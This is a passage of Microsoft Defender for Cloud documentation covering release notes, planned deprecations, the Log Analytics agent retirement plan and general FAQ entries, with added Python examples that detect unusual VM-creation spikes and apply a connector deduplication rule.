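if __name__ == "__main__":
    for vm in FLEET:
        status, reason = assess(vm)
        print(f"{vm.name:16} {status:9} {reason}")
    for rec, names in unhealthy_by_recommendation(FLEET).items():
        print(f"\n{rec}:\n  " + ", ".join(names))
```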


The new recommendations require Azure Automanage Machine Configuration. These recommendations are based on the following policies:

- (Preview) Windows virtual machines should enable Azure Disk Encryption or EncryptionAtHost
- (Preview) Linux virtual machines should enable Azure Disk Encryption or EncryptionAtHost

Learn more about ADE and EncryptionAtHost and how to enable one of them.


Changes in the recommendation Machines should be 
configured securely 


The recommendation Machines should be configured securely was updated. The 
update improves the performance and stability of the recommendation and aligns its 
experience with the generic behavior of Defender for Cloud's recommendations. 


As part of this update, the recommendation's ID was changed from 181ac480-f7c4-544b-9865-11b8ffe87f47 to c476dc48-8110-4139-91af-c8d940896b98.

No action is required on the customer side, and there's no expected effect on the secure score.


Deprecation of App Service language monitoring policies 


The following App Service language monitoring policies have been deprecated due to 
their ability to generate false negatives and because they don't provide better security. 
You should always ensure you're using a language version without any known 
vulnerabilities. 


Policy name (policy ID):

- App Service apps that use Java should use the latest 'Java version' (496223c3-ad65-4ecd-878a-bae78737e9ed)
- App Service apps that use Python should use the latest 'Python version' (7008174a-fd10-4ef0-817e-fc820a951d73)
- Function apps that use Java should use the latest 'Java version' (9d0b6ea4-93e2-4578-bf2f-6bb17d22b4bc)
- Function apps that use Python should use the latest 'Python version' (7238174a-fd10-4ef0-817e-fc820a951d73)
- App Service apps that use PHP should use the latest 'PHP version' (7261b898-8a84-4db8-9e04-18527132abb3)


Customers can use alternative built-in policies to monitor any specified language 
version for their App Services. 


These policies are no longer available in Defender for Cloud's built-in recommendations. 
You can add them as custom recommendations to have Defender for Cloud monitor 
them. 


New alert in Defender for Resource Manager 


Defender for Resource Manager has the following new alert:

Alert (alert type): PREVIEW - Suspicious creation of compute resources detected (ARM_SuspiciousComputeCreation)
Description: Microsoft Defender for Resource Manager identified a suspicious creation of compute resources in your subscription utilizing Virtual Machines/Azure Scale Set. The identified operations are designed to allow administrators to efficiently manage their environments by deploying new resources when needed. While this activity may be legitimate, a threat actor might utilize such operations to conduct crypto mining. The activity is deemed suspicious as the compute resources scale is higher than previously observed in the subscription. This can indicate that the principal is compromised and is being used with malicious intent.
MITRE tactics: Impact
Severity: Medium

You can see a list of all of the alerts available for Resource Manager.
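A baseline check in the spirit of the alert above ("scale is higher than previously observed in the subscription"), as an added example that is not Microsoft's detection logic. The Activity Log-style records, subscription ids, callers and the fixed-multiple threshold are constructed assumptions for the demo.

```python
# Added example (not Microsoft's detection logic): a baseline check in the spirit of
# ARM_SuspiciousComputeCreation, run over constructed Azure Activity Log-style records.
# Field names mirror the Activity Log schema (operationName, subscriptionId, caller,
# eventTimestamp, status) but every value below is constructed for this demo.
from collections import defaultdict
from datetime import datetime
from typing import Dict, List

# Resource-provider write operations that create VMs or scale sets (assumed to be the
# operations of interest; writes also cover updates, which this demo does not separate).
COMPUTE_CREATE_OPS = {
    "Microsoft.Compute/virtualMachines/write",
    "Microsoft.Compute/virtualMachineScaleSets/write",
}

VM_WRITE = "Microsoft.Compute/virtualMachines/write"


def _event(sub: str, op: str, caller: str, ts: str, status: str = "Succeeded") -> dict:
    return {"subscriptionId": sub, "operationName": op, "caller": caller,
            "eventTimestamp": ts, "status": status}


# Constructed log: sub-a normally creates a handful of VMs a day, then one principal
# creates 12 in a day; sub-b has only a first day, so it has no baseline yet.
ACTIVITY_LOG = [
    _event("sub-a", VM_WRITE, "ops@contoso.example", "2023-04-03T09:15:00+00:00"),
    _event("sub-a", VM_WRITE, "ops@contoso.example", "2023-04-03T11:40:00+00:00"),
    *[_event("sub-a", VM_WRITE, "ops@contoso.example", f"2023-04-04T10:{m:02d}:00+00:00")
      for m in (5, 20, 35)],
    _event("sub-a", "Microsoft.Compute/virtualMachineScaleSets/write",
           "ops@contoso.example", "2023-04-05T08:00:00+00:00"),
    # A restart is not a creation and must be ignored by the check.
    _event("sub-a", "Microsoft.Compute/virtualMachines/restart/action",
           "ops@contoso.example", "2023-04-05T08:30:00+00:00"),
    *[_event("sub-a", VM_WRITE, "svc-build-sp", f"2023-04-10T02:{m:02d}:00+00:00")
      for m in range(0, 60, 5)],
    _event("sub-b", VM_WRITE, "admin@fabrikam.example", "2023-04-10T14:00:00+00:00"),
]


def daily_creations(records: List[dict]) -> Dict[str, Dict[str, dict]]:
    """Count successful create operations per subscription and UTC day, remembering the
    principals that performed them. Returns {subscription: {day: {"count", "callers"}}}."""
    per_sub: Dict[str, Dict[str, dict]] = defaultdict(dict)
    for r in records:
        if r["operationName"] not in COMPUTE_CREATE_OPS or r["status"] != "Succeeded":
            continue
        day = datetime.fromisoformat(r["eventTimestamp"]).date().isoformat()
        entry = per_sub[r["subscriptionId"]].setdefault(day, {"count": 0, "callers": set()})
        entry["count"] += 1
        entry["callers"].add(r["caller"])
    return per_sub


def detect_scale_anomalies(records: List[dict], factor: float = 2.0,
                           min_count: int = 5) -> List[dict]:
    """Flag a day whose creation count exceeds `factor` times the highest daily count
    previously seen in the same subscription (and at least `min_count`, so a tiny
    baseline does not fire on one extra VM). The first observed day only seeds the
    baseline, and flagged days are not folded into it. A fixed multiple of the prior
    maximum is a deliberate simplification of "higher than previously observed"."""
    findings = []
    for sub, days in daily_creations(records).items():
        baseline = None
        for day in sorted(days):
            n = days[day]["count"]
            if baseline is not None and n >= min_count and n > factor * baseline:
                findings.append({
                    "subscriptionId": sub, "day": day, "observed": n,
                    "baseline": baseline, "principals": sorted(days[day]["callers"]),
                })
                continue  # do not let the anomalous day raise the baseline
            baseline = n if baseline is None else max(baseline, n)
    return findings


if __name__ == "__main__":
    for finding in detect_scale_anomalies(ACTIVITY_LOG):
        print(finding)
```

The `principals` field is what an analyst would pivot on next: a single service principal creating an unusual number of VMs is the "compromised principal" case the alert description calls out.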


Three alerts in the Defender for Resource Manager plan have been deprecated

The following three alerts for the Defender for Resource Manager plan have been deprecated:

- Activity from a risky IP address (ARM.MCAS_ActivityFromAnonymousIPAddresses)
- Activity from infrequent country (ARM.MCAS_ActivityFromInfrequentCountry)
- Impossible travel activity (ARM.MCAS_ImpossibleTravelActivity)

In a scenario where activity from a suspicious IP address is detected, one of the following Defender for Resource Manager plan alerts, Azure Resource Manager operation from suspicious IP address or Azure Resource Manager operation from suspicious proxy IP address, will be present.


Alerts automatic export to Log Analytics workspace have 
been deprecated 


Defender for Cloud security alerts are automatically exported to a default Log Analytics workspace on the resource level. This causes nondeterministic behavior and therefore we have deprecated this feature.


Instead, you can export your security alerts to a dedicated Log Analytics workspace with 
Continuous Export. 


If you have already configured continuous export of your alerts to a Log Analytics 
workspace, no further action is required. 


Deprecation and improvement of selected alerts for 
Windows and Linux Servers 


The security alert quality improvement process for Defender for Servers includes the 
deprecation of some alerts for both Windows and Linux servers. The deprecated alerts 
are now sourced from and covered by Defender for Endpoint threat alerts. 


If you already have the Defender for Endpoint integration enabled, no further action is 
required. You may experience a decrease in your alerts volume in April 2023. 


If you don't have the Defender for Endpoint integration enabled in Defender for Servers, 
you'll need to enable the Defender for Endpoint integration to maintain and improve 
your alert coverage. 


All Defender for Servers customers have full access to the Defender for Endpoint integration as a part of the Defender for Servers plan.


You can learn more about Microsoft Defender for Endpoint onboarding options. 
You can also view the full list of alerts that are set to be deprecated. 


Read the Microsoft Defender for Cloud blog.

New Azure Active Directory authentication-related recommendations for Azure Data Services

We have added four new Azure Active Directory authentication-related recommendations for Azure Data Services.


Recommendation name: Azure SQL Managed Instance authentication mode should be Azure Active Directory Only
Description: Disabling local authentication methods and allowing only Azure Active Directory Authentication improves security by ensuring that Azure SQL Managed Instances can exclusively be accessed by Azure Active Directory identities.
Policy: Azure SQL Managed Instance should have Azure Active Directory Only Authentication enabled

Recommendation name: Azure Synapse Workspace authentication mode should be Azure Active Directory Only
Description: Azure Active Directory only authentication methods improve security by ensuring that Synapse Workspaces exclusively require Azure AD identities for authentication. Learn more.
Policy: Synapse Workspaces should use only Azure Active Directory identities for authentication

Recommendation name: Azure Database for MySQL should have an Azure Active Directory administrator provisioned
Description: Provision an Azure AD administrator for your Azure Database for MySQL to enable Azure AD authentication. Azure AD authentication enables simplified permission management and centralized identity management of database users and other Microsoft services.
Policy: An Azure Active Directory administrator should be provisioned for MySQL servers

Recommendation name: Azure Database for PostgreSQL should have an Azure Active Directory administrator provisioned
Description: Provision an Azure AD administrator for your Azure Database for PostgreSQL to enable Azure AD authentication. Azure AD authentication enables simplified permission management and centralized identity management of database users and other Microsoft services.
Policy: An Azure Active Directory administrator should be provisioned for PostgreSQL servers

Two recommendations related to missing Operating 
System (OS) updates were released to GA 


The recommendations System updates should be installed on your machines (powered by Azure Update Manager) and Machines should be configured to periodically check for missing system updates have been released for General Availability.

To use the new recommendation, you need to:

- Connect your non-Azure machines to Arc.
- Enable the periodic assessment property. You can use the Fix button in the new recommendation, Machines should be configured to periodically check for missing system updates, to fix the recommendation.

After completing these steps, you can remove the old recommendation System updates should be installed on your machines, by disabling it from Defender for Cloud's built-in initiative in Azure Policy.

The two versions of the recommendations:

- System updates should be installed on your machines
- System updates should be installed on your machines (powered by Azure Update Manager)

will both be available until the Log Analytics agent is deprecated on August 31, 2024, which is when the older version (System updates should be installed on your machines) of the recommendation will be deprecated as well. Both recommendations return the same results and are available under the same control Apply system updates.

The new recommendation System updates should be installed on your machines (powered by Azure Update Manager) has a remediation flow available through the Fix button, which can be used to remediate any results through the Update Manager (Preview). This remediation process is still in Preview.

The new recommendation System updates should be installed on your machines (powered by Azure Update Manager) isn't expected to affect your Secure Score, as it has the same results as the old recommendation System updates should be installed on your machines.

The prerequisite recommendation (Enable the periodic assessment property) has a negative effect on your Secure Score. You can remediate the negative effect with the available Fix button.


Defender for APIs (Preview) 


Microsoft Defender for Cloud is announcing that the new Defender for APIs is available in preview.


Defender for APIs offers full lifecycle protection, detection, and response coverage for 
APIs. 


Defender for APIs helps you to gain visibility into business-critical APIs. You can 
investigate and improve your API security posture, prioritize vulnerability fixes, and 
quickly detect active real-time threats. 


Learn more about Defender for APIs. 


Next steps 


For past changes to Defender for Cloud, see Archive for what's new in Defender for Cloud.


Important upcoming changes to 
Microsoft Defender for Cloud 


Article • 10/24/2023

Important

The information on this page relates to pre-release products or features, which might be substantially modified before they are commercially released, if ever. Microsoft makes no commitments or warranties, express or implied, with respect to the information provided here.

On this page, you can learn about changes that are planned for Defender for Cloud. It describes planned modifications to the product that might affect things like your secure score or workflows.

Tip

Get notified when this page is updated by copying and pasting the following URL into your feed reader:

https://aka.ms/mdc/upcoming-rss

If you're looking for the latest release notes, you can find them in the What's new in Microsoft Defender for Cloud.


Planned changes

Planned change (announcement date; estimated date for change):

- Four alerts are set to be deprecated (announcement date: October 23, 2023; estimated date for change: November 23, 2023)
- Replacing the "Key Vaults should have purge protection enabled" recommendation with combined recommendation "Key Vaults should have deletion protection enabled" (estimated date for change: June 2023)
- Preview alerts for DNS servers to be deprecated (estimated date for change: August 2023)
- Classic connectors for multicloud will be retired (estimated date for change: September 2023)
- Change to the Log Analytics daily cap (estimated date for change: September 2023)
- DevOps Resource Deduplication for Defender for DevOps (estimated date for change: November 2023)
- Changes to Attack Path's Azure Resource Graph table scheme (estimated date for change: November 2023)
- Deprecating two security incidents (estimated date for change: November 2023)
- Defender for Cloud plan and strategy for the Log Analytics agent deprecation (estimated date for change: August 2024)

Four alerts are set to be deprecated

Announcement date: October 23, 2023

Estimated date for change: November 23, 2023

As part of our quality improvement process, the following security alerts are set to be deprecated:

- Possible data exfiltration detected (K8S.NODE_DataEgressArtifacts)
- Executable found running from a suspicious location (K8S.NODE_SuspectExecutablePath)
- Suspicious process termination burst (VM_TaskkillBurst)
- PsExec execution detected (VM_RunByPsExec)


Replacing the "Key Vaults should have purge protection enabled" recommendation with combined recommendation "Key Vaults should have deletion protection enabled"

Estimated date for change: June 2023

The Key Vaults should have purge protection enabled recommendation is deprecated from the (regulatory compliance dashboard/Azure security benchmark initiative) and replaced with a new combined recommendation Key Vaults should have deletion protection enabled.

Recommendation name: Key vaults should have deletion protection enabled
Description: A malicious insider in your organization can potentially delete and purge key vaults. Purge protection protects you from insider attacks by enforcing a mandatory retention period for soft deleted key vaults. No one inside your organization or Microsoft will be able to purge your key vaults during the soft delete retention period.
Effect(s): audit, deny, disabled
Version: 2.0.04

See the full index of Azure Policy built-in policy definitions for Key Vault.

Preview alerts for DNS servers to be deprecated

Estimated date for change: August 2023

Following the quality improvement process, security alerts for DNS servers are set to be deprecated in August. For cloud resources, use Azure DNS to receive the same security value.


The following table lists the alerts to be deprecated (AlertDisplayName: AlertType):

- Communication with suspicious random domain name (Preview): DNS_RandomizedDomain
- Communication with suspicious domain identified by threat intelligence (Preview): DNS_ThreatIntelSuspectDomain
- Digital currency mining activity (Preview): DNS_CurrencyMining
- Network intrusion detection signature activation (Preview): DNS_SuspiciousDomain
- Attempted communication with suspicious sinkholed domain (Preview): DNS_SinkholedDomain
- Communication with possible phishing domain (Preview): DNS_PhishingDomain
- Possible data transfer via DNS tunnel (Preview): DNS_DataObfuscation
- Possible data exfiltration via DNS tunnel (Preview): DNS_DataExfiltration
- Communication with suspicious algorithmically generated domain (Preview): DNS_DomainGenerationAlgorithm
- Possible data download via DNS tunnel (Preview): DNS_DataInfiltration
- Anonymity network activity (Preview): DNS_DarkWeb
- Anonymity network activity using web proxy (Preview): DNS_DarkWebProxy


Classic connectors for multicloud will be retired 


Estimated date for change: September 15, 2023 


The classic multicloud connectors will be retiring on September 15, 2023 and no data 
will be streamed to them after this date. These classic connectors were used to connect 
AWS Security Hub and GCP Security Command Center recommendations to Defender 
for Cloud and onboard AWS EC2s to Defender for Servers. 


The full value of these connectors has been replaced with the native multicloud security 
connectors experience, which has been Generally Available for AWS and GCP since 
March 2022 at no additional cost. 


The new native connectors are included in your plan and offer an automated 
onboarding experience with options to onboard single accounts, multiple accounts (with 
Terraform), and organizational onboarding with auto provisioning for the following 
Defender plans: free foundational CSPM capabilities, Defender Cloud Security Posture 
Management (CSPM), Defender for Servers, Defender for SQL, and Defender for 
Containers. 


If you're currently using the classic multicloud connectors, we strongly recommend that 
you begin your migration to the native security connectors before September 15, 2023. 


How to migrate to the native security connectors:

- Connect your AWS account to Defender for Cloud
- Connect your GCP project to Defender for Cloud


Change to the Log Analytics daily cap 


Azure Monitor offers the capability to set a daily cap on the data that is ingested on your Log Analytics workspaces. However, Defender for Cloud security data types are currently excluded from that cap.

Starting on September 18, 2023 the Log Analytics Daily Cap will no longer exclude the following set of data types:

- WindowsEvent
- SecurityAlert
- SecurityBaseline
- SecurityBaselineSummary
- SecurityDetection
- SecurityEvent
- WindowsFirewall
- MaliciousIPCommunication
- LinuxAuditLog
- SysmonEvent
- ProtectionStatus
- Update
- UpdateSummary
- CommonSecurityLog
- Syslog

At that time, all billable data types will be capped if the daily cap is met. This change improves your ability to fully contain costs from higher-than-expected data ingestion.


Learn more about workspaces with Microsoft Defender for Cloud. 


DevOps Resource Deduplication for Defender 
for DevOps 


Estimated date for change: November 2023 


To improve the Defender for DevOps user experience and enable further integration 
with Defender for Cloud's rich set of capabilities, Defender for DevOps will no longer 
support duplicate instances of a DevOps organization to be onboarded to an Azure 
tenant. 


If you don't have an instance of a DevOps organization onboarded more than once to your organization, no further action is required. If you do have more than one instance of a DevOps organization onboarded to your tenant, the subscription owner will be notified and will need to delete the DevOps Connector(s) they don't want to keep by navigating to Defender for Cloud Environment Settings.


Customers will have until November 14, 2023 to resolve this issue. After this date, only 
the most recent DevOps Connector created where an instance of the DevOps 
organization exists will remain onboarded to Defender for DevOps. For example, if 
Organization Contoso exists in both connectorA and connectorB, and connectorB was 
created after connectorA, then connectorA will be removed from Defender for DevOps. 
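The deduplication rule described above (Contoso in connectorA and connectorB, the newer connectorB wins), as an added example that is not Defender for DevOps' own code. The connector names and creation dates are constructed, and the rule that a connector stays onboarded while it still holds any organization is an assumption, since the note only covers single-organization connectors.

```python
# Added example (not Defender for DevOps' own code): the deduplication rule from the
# note, applied to constructed connector records. Connector and organization names are
# made up; "a connector survives while it still holds at least one organization" is an
# assumption, since the note only spells out the single-organization case.
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class DevOpsConnector:
    name: str
    created: datetime
    organizations: Tuple[str, ...]


def duplicate_organizations(connectors: List[DevOpsConnector]) -> Dict[str, List[str]]:
    """Organizations onboarded through more than one connector, with the connector names
    ordered oldest first. An empty result means no action is required."""
    holders: Dict[str, List[DevOpsConnector]] = {}
    for c in connectors:
        for org in c.organizations:
            holders.setdefault(org, []).append(c)
    return {
        org: [c.name for c in sorted(cs, key=lambda c: c.created)]
        for org, cs in holders.items() if len(cs) > 1
    }


def resolve_duplicates(connectors: List[DevOpsConnector]) -> Tuple[Dict[str, str], List[str]]:
    """Apply the November 14, 2023 rule: for each organization only the most recently
    created connector stays onboarded. Returns ({org: surviving connector}, [removed])."""
    latest: Dict[str, DevOpsConnector] = {}
    for c in connectors:
        for org in c.organizations:
            if org not in latest or c.created > latest[org].created:
                latest[org] = c
    survivors = {org: c.name for org, c in latest.items()}
    keep = set(survivors.values())
    removed = [c.name for c in connectors if c.name not in keep]
    return survivors, removed


def _utc(year: int, month: int, day: int) -> datetime:
    return datetime(year, month, day, tzinfo=timezone.utc)


# Constructed tenant: Contoso was onboarded twice (the note's example), Fabrikam once.
CONNECTORS = [
    DevOpsConnector("connectorA", _utc(2023, 3, 2), ("Contoso",)),
    DevOpsConnector("connectorB", _utc(2023, 8, 15), ("Contoso",)),
    DevOpsConnector("connectorC", _utc(2023, 6, 1), ("Fabrikam",)),
]

if __name__ == "__main__":
    print("duplicates:", duplicate_organizations(CONNECTORS))
    survivors, removed = resolve_duplicates(CONNECTORS)
    print("survivors:", survivors)
    print("removed:", removed)
```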


Changes to Attack Path's Azure Resource Graph 
table scheme 


Estimated date for change: November 2023 


The Attack Path's Azure Resource Graph (ARG) table scheme will be updated. The 
attackPathType property will be removed and additional properties will be added. 


Defender for Cloud plan and strategy for the 
Log Analytics agent deprecation 


Estimated date for change: August 2024 


The Azure Log Analytics agent, also known as the Microsoft Monitoring Agent (MMA), will be retired in August 2024. As a result, features of the two Defender for Cloud plans that rely on the Log Analytics agent are impacted, and they have updated strategies: Defender for Servers and Defender for SQL Server on machines.

Key strategy points

- The Azure Monitor agent (AMA) won't be a requirement of the Defender for Servers offering, but will remain required as part of Defender for SQL.
- Defender for Servers MMA-based features and capabilities will be deprecated in their Log Analytics version in August 2024, and delivered over alternative infrastructures, before the MMA deprecation date.
- In addition, the currently shared autoprovisioning process that provides the installation and configuration of both agents (MMA/AMA) will be adjusted accordingly.


Defender for Servers 


The following table explains how each capability will be provided after the Log Analytics agent retirement:

Feature: Defender for Endpoint/Defender for Cloud integration for down level machines (Windows Server 2012 R2, 2016)
Deprecation plan: Defender for Endpoint integration that uses the legacy Defender for Endpoint sensor and the Log Analytics agent (for Windows Server 2016 and Windows Server 2012 R2 machines) won't be supported after August 2024.
Alternative: Enable the GA unified agent integration to maintain support for machines, and receive the full extended feature set. For more information, see Enable the Microsoft Defender for Endpoint integration.

Feature: OS-level threat detection (agent-based)
Deprecation plan: OS-level threat detection based on the Log Analytics agent won't be available after August 2024. A full list of deprecated detections will be provided soon.
Alternative: OS-level detections are provided by Defender for Endpoint integration and are already GA.

Feature: Adaptive application controls
Deprecation plan: The current GA version based on the Log Analytics agent will be deprecated in August 2024, along with the preview version based on the Azure Monitor agent.
Alternative: The Adaptive Application Controls feature as it is today will be discontinued, and new capabilities in the application control space (on top of what Defender for Endpoint and Windows Defender Application Control offer today) will be considered as part of the future Defender for Servers roadmap.

Feature: Endpoint protection discovery recommendations
Deprecation plan: The current GA recommendations to install endpoint protection and fix health issues in the detected solutions will be deprecated in August 2024. The preview recommendations available today over Azure Monitor agent (AMA) will be deprecated when the alternative is provided over the Agentless Disk Scanning capability.
Alternative: A new agentless version will be provided for discovery and configuration gaps by April 2024. As part of this upgrade, this feature will be provided as a component of Defender for Servers plan 2 and Defender CSPM, and won't cover on-premises or Arc-connected machines.

Feature: Missing OS patches (system updates)
Deprecation plan: Recommendations to apply system updates based on the Log Analytics agent won't be available after August 2024. The preview version available today over the Guest Configuration agent will be deprecated when the alternative is provided over MDVM premium capabilities. Support of this feature for Docker-hub and VMMS will be deprecated in Aug 2024 and will be considered as part of the future Defender for Servers roadmap.
Alternative: New recommendations, based on integration with Update Manager, are already in GA, with no agent dependencies.

Feature: OS misconfigurations (Azure Security Benchmark recommendations)
Deprecation plan: The current GA version based on the Log Analytics agent won't be available after August 2024. The current preview version that uses the Guest Configuration agent will be deprecated as the Microsoft Defender Vulnerability Management integration becomes available.
Alternative: A new version, based on integration with Premium Microsoft Defender Vulnerability Management, will be available early in 2024, as part of Defender for Servers plan 2.

Feature: File integrity monitoring
Deprecation plan: The current GA version based on the Log Analytics agent won't be available after August 2024. The FIM Public Preview version based on Azure Monitor Agent (AMA) will be deprecated when the alternative is provided over Defender for Endpoint.
Alternative: A new version of this feature will be provided based on Microsoft Defender for Endpoint integration by April 2024.

Feature: The 500-MB benefit for data ingestion
Deprecation plan: The 500-MB benefit for data ingestion over the defined tables will remain supported via the AMA agent for the machines under subscriptions covered by Defender for Servers P2. Every machine is eligible for the benefit only once, even if both the Log Analytics agent and the Azure Monitor agent are installed on it.


Log analytics and Azure Monitoring agents autoprovisioning 
experience 


The current provisioning process that provides the installation and configuration of both agents (MMA/AMA) will be adjusted according to the plan mentioned above:

1. The MMA auto-provisioning mechanism and its related policy initiative will remain optional and supported until August 2024 through the Defender for Cloud platform.

2. In October 2023:

   a. The current shared 'Log Analytics agent'/'Azure Monitor agent' auto-provisioning mechanism will be updated and applied to 'Log Analytics agent' only.

   b. Azure Monitor agent (AMA) related Public Preview policy initiatives will be deprecated and replaced with the new auto-provisioning process for Azure Monitor agent (AMA), targeting only Azure registered SQL servers (SQL Server on Azure VM/Arc-enabled SQL Server).

3. Current customers with AMA with the Public Preview policy initiative enabled will still be supported but are recommended to migrate to the new policy.


To ensure the security of your servers and receive all the security updates from Defender 
for Servers, make sure to have Defender for Endpoint integration and agentless disk 
scanning enabled on your subscriptions. This will also keep your servers up-to-date with 
the alternative deliverables. 


Agents migration planning 


First, all Defender for Servers customers are advised to enable Defender for Endpoint 
integration and agentless disk scanning as part of the Defender for Servers offering, 
at no additional cost. This will ensure you are automatically covered with the new 
alternative deliverables, with no additional onboarding required. 


Following that, plan your migration according to your organization's requirements. The table below is keyed on two questions: is the Azure Monitor agent (AMA) required (for Defender for SQL or other scenarios), and is FIM/EPP discovery/Baselines required as part of Defender for Servers?

- AMA required: No. FIM/EPP/Baselines required: Yes. What should I do: You can remove MMA starting April 2024, using the GA version of Defender for Servers capabilities according to your needs (preview versions will be available earlier).

- AMA required: No. FIM/EPP/Baselines required: No. What should I do: You can remove MMA starting now.

- AMA required: Yes. FIM/EPP/Baselines required: No. What should I do: You can start migration from MMA to AMA now.

- AMA required: Yes. FIM/EPP/Baselines required: Yes. What should I do: You can either start migration from MMA to AMA starting April 2024 or, alternatively, you can use both agents side by side starting now.


Customers with Log analytics Agent (MMA) enabled 


- If the following features are required in your organization: File Integrity Monitoring (FIM), Endpoint Protection recommendations, OS misconfigurations (security baselines recommendations), you can start retiring from MMA in April 2024 when an alternative will be delivered in GA (preview versions will be available earlier).

- If the features mentioned above are required in your organization, and Azure Monitor agent (AMA) is required for other services as well, you can start migrating from MMA to AMA in April 2024. Alternatively, use both MMA and AMA to get all GA features, then remove MMA in April 2024.

- If the features mentioned above are not required, and Azure Monitor agent (AMA) is required for other services, you can start migrating from MMA to AMA now. However, note that the preview Defender for Servers capabilities over AMA will be deprecated in April 2024.

Customers with Azure Monitor agent (AMA) enabled

No action is required from your end.

- You'll receive all Defender for Servers GA capabilities through Agentless and Defender for Endpoint. The following features will be available in GA in April 2024: File Integrity Monitoring (FIM), Endpoint Protection recommendations, OS misconfigurations (security baselines recommendations). The preview Defender for Servers capabilities over AMA will be deprecated in April 2024.


Important

For more information about how to plan for this change, see Microsoft Defender for Cloud - strategy and plan towards Log Analytics Agent (MMA) deprecation.


Defender for SQL Server on machines 


The Defender for SQL Server on machines plan relies on the Log Analytics agent (MMA) 
/ Azure monitoring agent (AMA) to provide Vulnerability Assessment and Advanced 
Threat Protection to laaS SQL Server instances. The plan supports Log Analytics agent 
autoprovisioning in GA, and Azure Monitoring agent autoprovisioning in Public Preview. 


The following section describes the planned introduction of a new and improved SQL 
Server-targeted Azure monitoring agent (AMA) autoprovisioning process and the 
deprecation procedure of the Log Analytics agent (MMA). On-premises SQL servers 
using MMA will require the Azure Arc agent when migrating to the new process due to 
AMA requirements. Customers who use the new autoprovisioning process will benefit 
from a simple and seamless agent configuration, reducing onboarding errors and 
providing broader protection coverage. 


Milestone | Date | More information 

SQL-targeted AMA autoprovisioning Public Preview release | October 2023 | The new autoprovisioning process will only target Azure registered SQL servers (SQL Server on Azure VM / Arc-enabled SQL Server). The current AMA autoprovisioning process and its related policy initiative will be deprecated. It can still be used by customers, but they won't be eligible for support. 

SQL-targeted AMA autoprovisioning GA release | December 2023 | GA release of a SQL-targeted AMA autoprovisioning process. Following the release, it will be defined as the default option for all new customers. 

MMA deprecation | August 2024 | The current MMA autoprovisioning process and its related policy initiative will be deprecated. It can still be used by customers, but they won't be eligible for support. 


Deprecating two security incidents 


Estimated date for change: November 2023 


Following the quality improvement process, the following security incidents are set to be 
deprecated: Security incident detected suspicious virtual machines activity and 
Security incident detected on multiple machines. 


Next steps 


For all recent changes to Defender for Cloud, see What's new in Microsoft Defender for 
Cloud?. 


Common questions - General questions 


FAQ 


What is Microsoft Defender for Cloud? 


Microsoft Defender for Cloud helps you prevent, detect, and respond to threats with 
increased visibility into and control over the security of your resources. It provides 
integrated security monitoring and policy management across your subscriptions, helps 
detect threats that might otherwise go unnoticed, and works with a broad ecosystem of 
security solutions. 


Defender for Cloud uses monitoring components to collect and store data. For in-depth 
details, see Data collection in Microsoft Defender for Cloud. 


How do I get Microsoft Defender for Cloud? 


Microsoft Defender for Cloud is enabled with your Microsoft Azure subscription and 
accessed from the Azure portal. To access it, sign in to the portal, select Browse, 
and scroll to Defender for Cloud. 


Which Azure resources are monitored by Microsoft Defender for Cloud? 


Microsoft Defender for Cloud monitors the following Azure resources: 


• Virtual machines (VMs) (including Cloud Services) 
• Virtual Machine Scale Sets 
• The many Azure PaaS services listed in the product overview 


Defender for Cloud also protects on-premises resources and multicloud resources, 
including Amazon AWS and Google Cloud. 


How can I see the current security state of my Azure, multicloud, and on-premises resources? 


The Defender for Cloud Overview page shows the overall security posture of your 
environment broken down by Compute, Networking, Storage & data, and Applications. 
Each resource type has an indicator showing identified security vulnerabilities. Clicking 
each tile displays a list of security issues identified by Defender for Cloud, along with an 
inventory of the resources in your subscription. 


What is a security initiative? 


A security initiative defines the set of controls (policies) that are recommended for 
resources within the specified subscription. In Microsoft Defender for Cloud, you assign 
initiatives for your Azure subscriptions, AWS accounts, and GCP projects according to 
your company's security requirements and the type of applications or sensitivity of the 
data in each subscription. 


The security policies enabled in Microsoft Defender for Cloud drive security 
recommendations and monitoring. Learn more in What are security policies, initiatives, 
and recommendations?. 


Who can modify a security policy? 


To modify a security policy, you must be a Security Administrator or an Owner of that 
subscription. 


To learn how to configure a security policy, see Setting security policies in Microsoft 
Defender for Cloud. 


What is a security recommendation? 


Microsoft Defender for Cloud analyzes the security state of your Azure, multicloud, and 
on-premises resources. When potential security vulnerabilities are identified, 
recommendations are created. The recommendations guide you through the process of 
configuring the needed control. Examples are: 


• Provisioning of anti-malware to help identify and remove malicious software 
• Network security groups and rules to control traffic to virtual machines 
• Provisioning of a web application firewall to help defend against attacks targeting 
your web applications 
• Deploying missing system updates 
• Addressing OS configurations that do not match the recommended baselines 


Only recommendations that are enabled in Security Policies are shown here. 


What triggers a security alert? 


Microsoft Defender for Cloud automatically collects, analyzes, and fuses log data from 
your Azure, multicloud, and on-premises resources, the network, and partner solutions 
like antimalware and firewalls. When threats are detected, a security alert is created. 
Examples include detection of: 


• Compromised virtual machines communicating with known malicious IP addresses 
• Advanced malware detected using Windows error reporting 
• Brute force attacks against virtual machines 
• Security alerts from integrated partner security solutions such as Anti-Malware or 
Web Application Firewalls 


What's the difference between threats detected and alerted on by Microsoft 
Security Response Center versus Microsoft Defender for Cloud? 


The Microsoft Security Response Center (MSRC) performs select security monitoring of 
the Azure network and infrastructure and receives threat intelligence and abuse 
complaints from third parties. When MSRC becomes aware that customer data has been 
accessed by an unlawful or unauthorized party or that the customer's use of Azure does 
not comply with the terms for Acceptable Use, a security incident manager notifies the 
customer. Notification typically occurs by sending an email to the security contacts 
specified in Microsoft Defender for Cloud or the Azure subscription owner if a security 
contact is not specified. 


Defender for Cloud is an Azure service that continuously monitors the customer's Azure, 
multicloud, and on-premises environment and applies analytics to automatically detect 
a wide range of potentially malicious activity. These detections are surfaced as security 
alerts in the workload protection dashboard. 


How can I track who in my organization enabled a Microsoft Defender plan in 
Defender for Cloud? 


Azure Subscriptions may have multiple administrators with permissions to change the 
pricing settings. To find out which user made a change, use the Azure Activity Log. 


[Screenshot: the Azure Activity log, filtered to the last 6 hours, listing operations 
such as "Update pricing settings" (Succeeded) and "Create or Update Virtual Network 
Subnet" (Failed), with the Event initiated by column showing the user or identity 
behind each operation.] 


If the user's info isn't listed in the Event initiated by column, explore the event's JSON 
for the relevant details. 


[Screenshot: the JSON view of an "Update pricing settings" event. The initiating user 
appears in the event's claims block under 
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name, alongside fields such as 
correlationId, eventDataId, eventName (BeginRequest), category (Administrative), 
